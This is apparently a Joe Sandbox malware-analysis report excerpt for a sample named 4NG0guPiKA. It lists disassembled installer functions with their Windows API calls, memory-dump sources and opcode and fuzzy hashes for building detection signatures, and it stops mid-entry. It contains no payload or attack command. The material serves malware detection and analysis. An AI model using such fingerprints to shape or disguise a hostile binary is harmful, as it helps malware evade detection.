                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                            • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                            • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                            • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                            Function 00405194 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                            • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                            • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                            • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                            • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                            • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                            • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                            Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                                            • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                            • wsprintfW.USER32 ref: 00402D81
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                              • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                              • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                              • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                              • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                              • Part of subcall function 00402CFE: MulDiv.KERNEL32(000264EC,00000064,000275F8), ref: 00402D13
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                            • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                                            • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                            • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                            Function 00404A5E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                            • GetMessagePos.USER32 ref: 00404A81
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                            • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                            • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                            • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                            Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                            • wsprintfW.USER32 ref: 00402CD1
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                            • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                            • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                            • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                            Function 1000248D Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • wsprintfW.USER32 ref: 100024E1
                                                                                                            • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                                                                              • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,774CFFC0,100011AA,?,00000000), ref: 1000131E
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2435812281-0
                                                                                                            • Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                            • Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
                                                                                                            • Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                            • Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                                            Function 100018C1 Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                              • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal$lstrcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 176019282-0
                                                                                                            • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                            • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                                            • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                            • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                                            Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                            • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                            • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                            • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                            Function 10001617 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                                            • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1148316912-0
                                                                                                            • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                            • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                            • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                            • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                            Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                                            • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                            • Opcode Fuzzy Hash: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                                            • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                            Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D44
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                            • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                            • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                            • Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                            • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                            Function 00404978 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                            • wsprintfW.USER32 ref: 00404A12
                                                                                                            • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
